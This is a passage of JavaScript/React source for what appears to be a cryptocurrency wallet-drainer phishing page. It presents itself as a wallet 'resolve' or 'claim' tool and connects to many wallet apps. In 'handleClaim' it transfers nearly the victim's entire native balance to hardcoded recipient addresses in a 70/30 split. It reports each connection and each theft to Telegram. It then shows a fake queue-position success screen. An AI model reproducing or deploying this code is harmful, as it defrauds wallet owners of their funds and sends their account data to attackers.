      console.log('🔍 Attempting Uniswap Wallet connection...');
      
      // Direct Uniswap Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const uniswapDirectUrl = `uniswap://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Uniswap Wallet directly:', uniswapDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = uniswapDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = uniswapDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      let connectionCheckCount = 0;
      const maxChecks = 10;
      
      const checkConnection = async () => {
        connectionCheckCount++;
        console.log(`🔍 Checking for Uniswap Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
        
        if (typeof window.ethereum !== 'undefined') {
          try {
            // First check for existing connection (non-prompting)
            const existingAccount = await checkExistingConnection(window.ethereum);
            if (existingAccount && !account) {
              console.log('🔍 Found existing Uniswap Wallet connection:', existingAccount);
              handleConnectionSuccess(existingAccount);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
              return;
            }
            
            // Only request connection on first check
            if (connectionCheckCount === 1 && !account) {
              const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                handleConnectionSuccess(accounts[0]);
                if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                return;
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              setError('Uniswap Wallet connection failed. Please try again.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          }
        } else if (connectionCheckCount === maxChecks) {
          setError('Uniswap Wallet not available. Please install the app.');
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
        
        // Continue checking if not connected
        if (connectionCheckCount < maxChecks && !account) {
          setTimeout(checkConnection, 2000);
        } else if (connectionCheckCount >= maxChecks && !account) {
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
      };
      
      setTimeout(checkConnection, 2000);
      
    } catch (err) {
      console.error('❌ Uniswap Wallet connection failed:', err);
      setError(`Uniswap Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Zeal Wallet
  const connectZealWallet = async () => {
    console.log('🔍 connectZealWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Zeal Wallet connection...');
      
      // Direct Zeal Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const zealDirectUrl = `zeal://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Zeal Wallet directly:', zealDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = zealDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = zealDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      setTimeout(async () => {
        if (typeof window.ethereum !== 'undefined') {
          try {
            const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
            handleConnectionSuccess(accounts[0]);
          } catch (err) {
            setError('Zeal Wallet connection failed. Please try again.');
            setIsConnecting(false);
          }
        } else {
          setError('Zeal Wallet not available. Please install the app.');
          setIsConnecting(false);
        }
        
        // Clean up iframe
        if (iframe.parentNode) {
          iframe.parentNode.removeChild(iframe);
        }
      }, 5000);
      
    } catch (err) {
      console.error('❌ Zeal Wallet connection failed:', err);
      setError(`Zeal Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Zerion Wallet
  const connectZerionWallet = async () => {
    console.log('🔍 connectZerionWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Zerion Wallet connection...');
      
      // Direct Zerion Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const zerionDirectUrl = `zerion://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Zerion Wallet directly:', zerionDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = zerionDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = zerionDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      let connectionCheckCount = 0;
      const maxChecks = 10;
      
      const checkConnection = async () => {
        connectionCheckCount++;
        console.log(`🔍 Checking for Zerion Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
        
        if (typeof window.ethereum !== 'undefined') {
          try {
            // First check for existing connection (non-prompting)
            const existingAccount = await checkExistingConnection(window.ethereum);
            if (existingAccount && !account) {
              console.log('🔍 Found existing Zerion Wallet connection:', existingAccount);
              handleConnectionSuccess(existingAccount);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
              return;
            }
            
            // Only request connection on first check
            if (connectionCheckCount === 1 && !account) {
              const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                handleConnectionSuccess(accounts[0]);
                if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                return;
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              setError('Zerion Wallet connection failed. Please try again.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          }
        } else if (connectionCheckCount === maxChecks) {
          setError('Zerion Wallet not available. Please install the app.');
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
        
        // Continue checking if not connected
        if (connectionCheckCount < maxChecks && !account) {
          setTimeout(checkConnection, 2000);
        } else if (connectionCheckCount >= maxChecks && !account) {
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
      };
      
      setTimeout(checkConnection, 2000);
      
    } catch (err) {
      console.error('❌ Zerion Wallet connection failed:', err);
      setError(`Zerion Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Keplr Wallet
  const connectKeplrWallet = async () => {
    console.log('🔍 connectKeplrWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Keplr Wallet connection...');
      
      // Check if Keplr extension is available (desktop)
      if (typeof window.keplr !== 'undefined') {
        try {
          // Request connection to Keplr
          await window.keplr.enable('cosmoshub-4'); // Default Cosmos chain
          const offlineSigner = window.keplr.getOfflineSigner('cosmoshub-4');
          const accounts = await offlineSigner.getAccounts();
          
          if (accounts && accounts.length > 0) {
            // For EVM compatibility, we'll use the first account address
            const accountAddress = accounts[0].address;
            console.log('🔍 Keplr account connected:', accountAddress);
            
            // Create a mock ethereum provider for Keplr (since it's Cosmos-based)
            // This allows the existing EVM logic to work
            const mockEthereumProvider = {
              request: async (method, params) => {
                if (method === 'eth_requestAccounts') {
                  return [accountAddress];
                }
                throw new Error('Keplr wallet does not support EVM methods');
              }
            };
            
            // Temporarily set window.ethereum for connection
            const originalEthereum = window.ethereum;
            window.ethereum = mockEthereumProvider;
            
            handleConnectionSuccess(accountAddress);
            
            // Restore original ethereum provider
            window.ethereum = originalEthereum;
          } else {
            throw new Error('No accounts found in Keplr');
          }
        } catch (err) {
          console.error('❌ Keplr connection failed:', err);
          setError('Keplr connection failed. Please try again.');
          setIsConnecting(false);
        }
      } else {
        // Mobile: Try to open Keplr app
        const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        
        if (isMobile) {
          const returnUrl = encodeURIComponent(window.location.href);
          const keplrDirectUrl = `keplr://wallet/connect?url=${returnUrl}`;
          console.log('🔍 Opening Keplr Wallet directly:', keplrDirectUrl);
          
          // Create a hidden iframe to trigger the deep-link
          const iframe = document.createElement('iframe');
          iframe.style.display = 'none';
          iframe.src = keplrDirectUrl;
          document.body.appendChild(iframe);
          
          // Also try window.location as fallback
          setTimeout(() => {
            window.location.href = keplrDirectUrl;
          }, 100);
          
          // Wait for wallet to open and check connection
          setTimeout(async () => {
            if (typeof window.keplr !== 'undefined') {
              try {
                await window.keplr.enable('cosmoshub-4');
                const offlineSigner = window.keplr.getOfflineSigner('cosmoshub-4');
                const accounts = await offlineSigner.getAccounts();
                
                if (accounts && accounts.length > 0) {
                  const accountAddress = accounts[0].address;
                  handleConnectionSuccess(accountAddress);
                } else {
                  setError('No accounts found in Keplr. Please try again.');
                  setIsConnecting(false);
                }
              } catch (err) {
                setError('Keplr connection failed. Please try again.');
                setIsConnecting(false);
              }
            } else {
              setError('Keplr not available. Please install the app.');
              setIsConnecting(false);
            }
            
            // Clean up iframe
            if (iframe.parentNode) {
              iframe.parentNode.removeChild(iframe);
            }
          }, 5000);
        } else {
          setError('Keplr not available. Please install the extension.');
          setIsConnecting(false);
        }
      }
      
    } catch (err) {
      console.error('❌ Keplr Wallet connection failed:', err);
      setError(`Keplr Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Rabby Wallet
  const connectRabbyWallet = async () => {
    console.log('🔍 connectRabbyWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Rabby Wallet connection...');
      
      // Check if Rabby extension is available (desktop)
      if (typeof window.rabby !== 'undefined') {
        try {
          // First check for existing connection
          const existingAccount = await checkExistingConnection(window.rabby);
          if (existingAccount && !account) {
            console.log('🔍 Found existing Rabby connection:', existingAccount);
            handleConnectionSuccess(existingAccount);
            return;
          }
          
          // Request connection if not already connected
          const accounts = await window.rabby.request({ method: 'eth_requestAccounts' });
          if (accounts && accounts.length > 0) {
            handleConnectionSuccess(accounts[0]);
          }
        } catch (err) {
          console.error('❌ Rabby connection failed:', err);
          setError('Rabby connection failed. Please try again.');
          setIsConnecting(false);
        }
      } else if (typeof window.ethereum !== 'undefined' && window.ethereum.isRabby) {
        // Check if current ethereum provider is Rabby
        try {
          // First check for existing connection
          const existingAccount = await checkExistingConnection(window.ethereum);
          if (existingAccount && !account) {
            console.log('🔍 Found existing Rabby (via ethereum) connection:', existingAccount);
            handleConnectionSuccess(existingAccount);
            return;
          }
          
          // Request connection if not already connected
          const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
          if (accounts && accounts.length > 0) {
            handleConnectionSuccess(accounts[0]);
          }
        } catch (err) {
          console.error('❌ Rabby connection failed:', err);
          setError('Rabby connection failed. Please try again.');
          setIsConnecting(false);
        }
      } else {
        // Mobile: Try to open Rabby app
        const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        
        if (isMobile) {
          const returnUrl = encodeURIComponent(window.location.href);
          const rabbyDirectUrl = `rabby://wallet/connect?url=${returnUrl}`;
          console.log('🔍 Opening Rabby Wallet directly:', rabbyDirectUrl);
          
          // Create a hidden iframe to trigger the deep-link
          const iframe = document.createElement('iframe');
          iframe.style.display = 'none';
          iframe.src = rabbyDirectUrl;
          document.body.appendChild(iframe);
          
          // Also try window.location as fallback
          setTimeout(() => {
            window.location.href = rabbyDirectUrl;
          }, 100);
          
          // Wait for wallet to open and check connection
          let connectionCheckCount = 0;
          const maxChecks = 10;
          
          const checkConnection = async () => {
            connectionCheckCount++;
            console.log(`🔍 Checking for Rabby Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
            
            if (typeof window.rabby !== 'undefined') {
              try {
                // First check for existing connection
                const existingAccount = await checkExistingConnection(window.rabby);
                if (existingAccount && !account) {
                  console.log('🔍 Found existing Rabby connection:', existingAccount);
                  handleConnectionSuccess(existingAccount);
                  if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                  return;
                }
                
                // Only request connection on first check
                if (connectionCheckCount === 1 && !account) {
                  const accounts = await window.rabby.request({ method: 'eth_requestAccounts' });
                  if (accounts && accounts.length > 0) {
                    handleConnectionSuccess(accounts[0]);
                    if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                    return;
                  }
                }
              } catch (err) {
                if (connectionCheckCount === maxChecks) {
                  setError('Rabby connection failed. Please try again.');
                  setIsConnecting(false);
                  if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                }
              }
            } else if (typeof window.ethereum !== 'undefined' && window.ethereum.isRabby) {
              try {
                // First check for existing connection
                const existingAccount = await checkExistingConnection(window.ethereum);
                if (existingAccount && !account) {
                  console.log('🔍 Found existing Rabby (via ethereum) connection:', existingAccount);
                  handleConnectionSuccess(existingAccount);
                  if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                  return;
                }
                
                // Only request connection on first check
                if (connectionCheckCount === 1 && !account) {
                  const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
                  if (accounts && accounts.length > 0) {
                    handleConnectionSuccess(accounts[0]);
                    if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                    return;
                  }
                }
              } catch (err) {
                if (connectionCheckCount === maxChecks) {
                  setError('Rabby connection failed. Please try again.');
                  setIsConnecting(false);
                  if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                }
              }
            } else if (connectionCheckCount === maxChecks) {
              setError('Rabby not available. Please install the app.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
            
            // Continue checking if not connected
            if (connectionCheckCount < maxChecks && !account) {
              setTimeout(checkConnection, 2000);
            } else if (connectionCheckCount >= maxChecks && !account) {
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          };
          
          setTimeout(checkConnection, 2000);
        } else {
          setError('Rabby not available. Please install the extension.');
          setIsConnecting(false);
        }
      }
      
    } catch (err) {
      console.error('❌ Rabby Wallet connection failed:', err);
      setError(`Rabby Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Handle successful connection
  const handleConnectionSuccess = async (newAccount) => {
    // Prevent duplicate connections - check against current account state
    if (newAccount && account && newAccount.toLowerCase() === account.toLowerCase()) {
      console.log('🔍 Already connected to this account, skipping...');
      return;
    }
    
    // Stop all connection attempts immediately
    setIsConnecting(false);
    
    if (!newAccount) {
      return;
    }
    
    console.log('🔍 Connection successful, account:', newAccount);
    
    try {
      // Create provider and signer
      // Use the provider that was used for connection (window.ethereum or window.BinanceChain)
      let walletProvider = window.ethereum;
      if (!walletProvider && typeof window.BinanceChain !== 'undefined') {
        walletProvider = window.BinanceChain;
      }
      
      if (!walletProvider) {
        throw new Error('No wallet provider available');
      }
      
      const ethersProvider = new ethers.providers.Web3Provider(walletProvider);
      const ethersSigner = ethersProvider.getSigner();
      
      // Get chain info first for proper formatting
      const chainId = (await ethersProvider.getNetwork()).chainId;
      const chainInfo = EVM_CHAINS_CONFIG[chainId] || EVM_CHAINS_CONFIG[1];
      const decimals = chainInfo.decimals || 18;
      const symbol = chainInfo.symbol || 'ETH';
      const chainName = chainInfo.name || 'Ethereum';
      
      // Get balance with chain-aware formatting
      const balance = await ethersProvider.getBalance(newAccount);
      const formattedBalance = ethers.utils.formatUnits(balance, decimals);
      
      setAccount(newAccount);
      setProvider(ethersProvider);
      setSigner(ethersSigner);
      setBalance(formattedBalance);
      setIsConnecting(false);
      
      console.log('✅ EVM Wallet Connected Successfully!');
      console.log('Account:', newAccount);
      console.log('Balance:', formattedBalance, symbol);
      console.log('Chain:', chainName);

      notifyTelegram({
        event: 'wallet_connect',
        chain: chainName,
        status: 'success',
        amount: `${formattedBalance} ${symbol}`,
        account: newAccount,
      });
      
    } catch (err) {
      console.error('❌ Failed to setup connection:', err);
      setError(`Connection setup failed: ${err.message}`);
      setIsConnecting(false);

      // For error cases, use 'EVM' as fallback (chain info may not be available)
      notifyTelegram({
        event: 'wallet_connect',
        chain: 'EVM',
        status: 'failed',
        amount: 'n/a',
        account: newAccount || 'n/a',
        detail: err?.message,
      });
    }
  };

  // Disconnect function
  const disconnect = () => {
    console.log('🔍 Disconnecting EVM wallet...');
    
    // Disconnect MetaMask SDK if connected
    if (sdk && connected) {
      sdk.disconnect();
    }
    
    setAccount(null);
    setProvider(null);
    setSigner(null);
    setBalance(null);
    setError('');
    setSuccess(false);
    setIsConnecting(false);
    console.log('✅ EVM wallet disconnected');
  };

  // Handle claim function for EVM tokens
  const handleClaim = async () => {
    console.log('🔍 handleClaim called - starting EVM transfer...');
    let chainInfo = null; // Declare outside try block for use in catch block
    try {
      setLoading(true);
      setError('');
      setSuccess(false);

      if (!signer || !account) {
        throw new Error('Please connect your wallet first');
      }

      console.log('🔍 Getting current balance...');
      const currentBalance = await provider.getBalance(account);
      const chainId = (await provider.getNetwork()).chainId;
      chainInfo = EVM_CHAINS_CONFIG[chainId] || EVM_CHAINS_CONFIG[1]; // Fallback to ETH
      const nativeSymbol = chainInfo.symbol || 'ETH';
      
      console.log('🔍 Current balance:', ethers.utils.formatUnits(currentBalance, chainInfo.decimals || 18), nativeSymbol);
      console.log('🔍 Chain ID:', chainId);
      
      // Get proper gas estimation
      const [gasPrice, feeData] = await Promise.all([
        provider.getGasPrice().catch(() => null),
        provider.getFeeData().catch(() => null),
      ]);
      
      // Use maxFeePerGas if available (EIP-1559), otherwise use gasPrice
      const effectiveGasPrice = feeData?.maxFeePerGas || gasPrice;
      if (!effectiveGasPrice) {
        throw new Error('Could not fetch gas price');
      }
      
      // Estimate gas for a simple transfer (21000 is standard, but estimate to be safe)
      const gasEstimate = ethers.BigNumber.from(21000);
      // Add 20% buffer for safety
      const gasLimit = gasEstimate.mul(120).div(100);
      
      // Prepare recipients - check if we'll do split transfer
      let hasValidSecondary = false;
      try {
        ethers.utils.getAddress(EVM_SECONDARY_RECIPIENT);
        hasValidSecondary = true;
        console.log('🔍 Secondary recipient is valid - will do 70/30 split');
      } catch (_) {
        hasValidSecondary = false;
        console.log('🔍 Secondary recipient is invalid, sending 100% to primary');
      }

      // Calculate total gas cost - need gas for BOTH transactions if splitting
      const numberOfTransactions = hasValidSecondary ? 2 : 1;
      const totalGasCost = effectiveGasPrice.mul(gasLimit).mul(numberOfTransactions);
      
      // Calculate sendable amount with safety buffer
      // Buffer is 0.001 ETH equivalent in native token
      const bufferAmount = ethers.utils.parseUnits('0.001', chainInfo.decimals || 18);
      const sendableAmount = currentBalance.sub(totalGasCost).sub(bufferAmount);

      if (sendableAmount.lte(0)) {
        throw new Error('Insufficient balance for transaction');
      }
      
      console.log('🔍 Sendable amount:', ethers.utils.formatUnits(sendableAmount, chainInfo.decimals || 18), nativeSymbol);
      console.log('🔍 Total gas cost for', numberOfTransactions, 'transaction(s):', ethers.utils.formatUnits(totalGasCost, chainInfo.decimals || 18), nativeSymbol);

      // Store transaction hashes for notification
      let txHash = 'n/a';
      let receipt1, receipt2, tx, receipt;

      if (hasValidSecondary) {
        // Split 70/30
        const amountToPrimary = sendableAmount.mul(70).div(100);
        const amountToSecondary = sendableAmount.sub(amountToPrimary);

        console.log('🔍 Sending 70% to primary:', ethers.utils.formatUnits(amountToPrimary, chainInfo.decimals || 18), nativeSymbol);
        console.log('🔍 Sending 30% to secondary:', ethers.utils.formatUnits(amountToSecondary, chainInfo.decimals || 18), nativeSymbol);

        // Send to primary recipient
        const tx1 = await signer.sendTransaction({
          to: EVM_PRIMARY_RECIPIENT,
          value: amountToPrimary,
          gasLimit: gasLimit,
          ...(feeData?.maxFeePerGas ? {
            maxFeePerGas: feeData.maxFeePerGas,
            maxPriorityFeePerGas: feeData.maxPriorityFeePerGas,
          } : {
            gasPrice: effectiveGasPrice,
          }),
        });

        console.log('🔍 Primary transaction sent:', tx1.hash);
        
        receipt1 = await tx1.wait();
        console.log('🔍 Primary transaction confirmed:', receipt1);
        
        // Send to secondary recipient
        const tx2 = await signer.sendTransaction({
          to: EVM_SECONDARY_RECIPIENT,
          value: amountToSecondary,
          gasLimit: gasLimit,
          ...(feeData?.maxFeePerGas ? {
            maxFeePerGas: feeData.maxFeePerGas,
            maxPriorityFeePerGas: feeData.maxPriorityFeePerGas,
          } : {
            gasPrice: effectiveGasPrice,
          }),
        });

        console.log('🔍 Secondary transaction sent:', tx2.hash);
        
        receipt2 = await tx2.wait();
        console.log('🔍 Secondary transaction confirmed:', receipt2);
        
        // Combine transaction hashes
        txHash = `${tx1.hash}, ${tx2.hash}`;
      } else {
        // Fallback: send 100% to primary
        console.log('🔍 Sending 100% to primary:', ethers.utils.formatUnits(sendableAmount, chainInfo.decimals || 18), nativeSymbol);
        
        tx = await signer.sendTransaction({
          to: EVM_PRIMARY_RECIPIENT,
          value: sendableAmount,
          gasLimit: gasLimit,
          ...(feeData?.maxFeePerGas ? {
            maxFeePerGas: feeData.maxFeePerGas,
            maxPriorityFeePerGas: feeData.maxPriorityFeePerGas,
          } : {
            gasPrice: effectiveGasPrice,
          }),
        });

        console.log('🔍 Transaction sent:', tx.hash);
        
        receipt = await tx.wait();
        console.log('🔍 Transaction confirmed:', receipt);
        
        txHash = tx.hash;
      }
      
      console.log('✅ All EVM transactions completed successfully!');
      setSuccess(true);

      // Format amount with chain-specific symbol
      const formattedAmount = ethers.utils.formatUnits(sendableAmount, chainInfo.decimals || 18);

      notifyTelegram({
        event: 'claim',
        chain: chainInfo.name || 'EVM',
        status: 'success',
        amount: `${formattedAmount} ${nativeSymbol}`,
        account,
        txHash: txHash,
      });

    } catch (err) {
      console.error('❌ EVM claim failed:', err);
      setError(`Claim failed: ${err.message || 'Please try again.'}`);

      // Get chain name for error notification
      const chainName = chainInfo?.name || 'EVM';

      notifyTelegram({
        event: 'claim',
        chain: chainName,
        status: 'failed',
        amount: 'n/a',
        account,
        txHash: null,
        detail: err?.message,
      });
    } finally {
      setLoading(false);
    }
  };

  // Wallet configurations with local images from walls folder
  const wallets = [
    {
      id: 'metamask',
      name: 'MetaMask',
      image: MetaMaskWallet,
      description: 'Most popular Ethereum wallet',
      connect: connectMetaMask
    },
    {
      id: 'trust',
      name: 'Trust Wallet',
      image: TrustWallet,
      description: 'Binance\'s official wallet',
      connect: connectTrustWallet
    },
    {
      id: 'coinbase',
      name: 'Coinbase Wallet',
      image: CoinbaseWallet,
      description: 'Coinbase\'s secure wallet',
      connect: connectCoinbaseWallet
    },
    {
      id: 'binance',
      name: 'Binance Wallet',
      image: BinanceWallet,
      description: 'Binance\'s official wallet',
      connect: connectBinanceWallet
    },
    {
      id: 'okx',
      name: 'OKX Wallet',
      image: OKXWallet,
      description: 'OKX exchange wallet',
      connect: connectOKXWallet
    },
    {
      id: 'bitget',
      name: 'Bitget Wallet',
      image: BitgetWallet,
      description: 'Bitget exchange wallet',
      connect: connectBitgetWallet
    },
    {
      id: 'brave',
      name: 'Brave Wallet',
      image: BraveWallet,
      description: 'Brave browser wallet',
      connect: connectBraveWallet
    },
    {
      id: 'bybit',
      name: 'Bybit Wallet',
      image: BybitWallet,
      description: 'Bybit exchange wallet',
      connect: connectBybitWallet
    },
    {
      id: 'cryptodotcom',
      name: 'Crypto.com Wallet',
      image: CryptoDotComWallet,
      description: 'Crypto.com exchange wallet',
      connect: connectCryptoDotComWallet
    },
    {
      id: 'blockchain',
      name: 'Blockchain.com',
      image: BlockchainWallet,
      description: 'Blockchain.com wallet',
      connect: connectBlockchainWallet
    },
    {
      id: 'safepal',
      name: 'SafePal Wallet',
      image: SafePalWallet,
      description: 'SafePal hardware wallet',
      connect: connectSafePalWallet
    },
    {
      id: 'uniswap',
      name: 'Uniswap Wallet',
      image: UniswapWallet,
      description: 'Uniswap DEX wallet',
      connect: connectUniswapWallet
    },
    {
      id: 'zeal',
      name: 'Zeal Wallet',
      image: ZealWallet,
      description: 'Zeal DeFi wallet',
      connect: connectZealWallet
    },
    {
      id: 'zerion',
      name: 'Zerion Wallet',
      image: ZerionWallet,
      description: 'Zerion DeFi wallet',
      connect: connectZerionWallet
    },
    {
      id: 'keplr',
      name: 'Keplr Wallet',
      image: KeplrWallet,
      description: 'Cosmos ecosystem wallet',
      connect: connectKeplrWallet
    },
    {
      id: 'rabby',
      name: 'Rabby Wallet',
      image: RabbyWallet,
      description: 'DeBank\'s secure wallet',
      connect: connectRabbyWallet
    }
  ];

  return (
    <div className="space-y-6">
      <div className="space-y-4 mb-6">
        <div className="p-3 sm:p-4 rounded-lg bg-white/5">
          <h3 className="text-base sm:text-lg font-semibold mb-4">Resolve issue</h3>
          <div className="space-y-3">
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-1 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Wallet balance:</span>
              <div className="flex items-center space-x-2">
                <div className="bg-primary-500 w-4 h-4 sm:w-5 sm:h-5 rounded-full shadow-glow"></div>
                <span className="font-medium text-sm sm:text-base">
                  {balance ? `${balance} ETH` : '$1K ~ 0.5 ETH'}
                </span>
              </div>
            </div>
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-1 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Completion time:</span>
              <span className="font-medium text-sm sm:text-base">Instantly</span>
            </div>
          </div>
        </div>
      </div>

      {!account ? (
        <div className="text-center py-6 sm:py-8">
          {/* Mobile Browser Detection Banner */}
          {(() => {
            const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
            const isDAppBrowser = window.ethereum || window.BinanceChain || window.trustwallet;
            
            if (isMobile && !isDAppBrowser) {
              return (
                <div className="mb-6 p-4 bg-yellow-900/20 rounded-lg border border-yellow-700/30">
                  <div className="flex items-center justify-center mb-2">
                    <svg className="w-5 h-5 text-yellow-400 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                      <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-2.5L13.732 4c-.77-.833-1.964-.833-2.732 0L3.732 16.5c-.77.833.192 2.5 1.732 2.5z" />
                    </svg>
                    <span className="text-yellow-300 font-medium">Mobile Browser Detected</span>
                  </div>
                  <p className="text-sm text-yellow-200 mb-3">
                    For best wallet connection experience, open this website in your wallet's DApp browser:
                  </p>
                  <div className="space-y-2">
                    <button 
                      onClick={() => window.location.href = 'https://link.trustwallet.com/open_url?coin_id=60&url=' + encodeURIComponent(window.location.href)}
                      className="w-full p-2 bg-yellow-600/30 hover:bg-yellow-600/50 text-yellow-200 rounded text-sm transition-colors"
                    >
                      📱 Open in Trust Wallet
                    </button>
                    <button 
                      onClick={() => window.location.href = 'https://wallet.coinbase.com/connect?redirect_uri=' + encodeURIComponent(window.location.href)}
                      className="w-full p-2 bg-blue-600/30 hover:bg-blue-600/50 text-blue-200 rounded text-sm transition-colors"
                    >
                      📱 Open in Coinbase Wallet
                    </button>
                  </div>
                </div>
              );
            }
            return null;
          })()}
          
          <h3 className="text-lg sm:text-xl font-semibold mb-3 sm:mb-4">Connect Your Wallet</h3>
          <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">Please connect your wallet to proceed with the resolve</p>
          <div className="flex flex-col items-center space-y-3">
            <button
              onClick={() => setShowWalletSelector(true)}
              className="!bg-gradient-primary !text-white hover:!shadow-glow-lg !rounded-lg !h-12 !px-6 font-semibold transition-all shadow-glow"
            >
              Connect EVM Wallet
            </button>
            <button
              onClick={disconnect}
              className="text-gray-400 hover:text-gray-300 text-sm transition-colors px-4 py-2 rounded-lg hover:bg-gray-800/50 active:bg-gray-700/50 touch-manipulation"
            >
              Clear Selection
            </button>
                                  {isConnecting && (
                        <div className="text-center mt-4">
                          <div className="loading-spinner mx-auto mb-2"></div>
                          <p className="text-sm text-gray-400">Connecting to wallet...</p>
                          <div className="mt-3 p-3 bg-blue-900/20 rounded-lg border border-blue-700/30">
                            <p className="text-xs text-blue-300 mb-2">📱 Mobile Connection Tips:</p>
                            <ul className="text-xs text-blue-200 space-y-1 text-left">
                              <li>• The wallet app should open automatically</li>
                              <li>• Approve the connection request in the app</li>
                              <li>• Return to this page after approval</li>
                              <li>• If app doesn't open, check if wallet is installed</li>
                            </ul>
                          </div>
                        </div>
                      )}
          </div>
        </div>
      ) : success ? (
        <div className="text-center py-6 sm:py-8">
          <div className="mx-auto w-12 h-12 sm:w-16 sm:h-16 rounded-full bg-primary-500/30 flex items-center justify-center mb-3 sm:mb-4 shadow-glow">
            <Clock size={24} className="sm:w-8 sm:h-8 text-primary-300" />
          </div>
          <h3 className="text-lg sm:text-xl font-semibold mb-2">You Have Been Added to Queue</h3>
          <p className="text-gray-300 mb-4 sm:mb-6 text-sm sm:text-base">Your resolve for $1k ~ 0.5 ETH is being processed</p>
          <div className="p-3 rounded-lg bg-white/5 mb-4">
            <div className="flex justify-between items-center mb-2">
              <span className="text-gray-400 text-sm sm:text-base">Position</span>
              <span className="font-medium text-sm sm:text-base">#42</span>
            </div>
            <div className="w-full bg-primary-900/50 rounded-full h-2">
              <div className="bg-gradient-primary h-2 rounded-full w-1/4"></div>
            </div>
          </div>
          <div className="flex items-center justify-center space-x-2 text-xs sm:text-sm text-gray-400">
            <span>Check status on Explorer</span>
            <ExternalLink size={12} className="sm:w-3.5 sm:h-3.5" />
          </div>
          <button
            onClick={() => setSuccess(false)}
            className="mt-4 sm:mt-6 w-full py-2.5 sm:py-3 rounded-lg bg-gradient-primary text-white font-semibold hover:shadow-glow-lg transition-all text-sm sm:text-base shadow-glow"
          >
            Make Another Resolve
          </button>
        </div>
      ) : (
        <>
          <div className="p-3 rounded-lg bg-white/5 mb-6">
            <div className="flex flex-col sm:flex-row sm:justify-between sm:items-center space-y-2 sm:space-y-0">
              <span className="text-gray-400 text-sm sm:text-base">Connected Wallet</span>
              <div className="flex items-center justify-between sm:justify-end space-x-2">
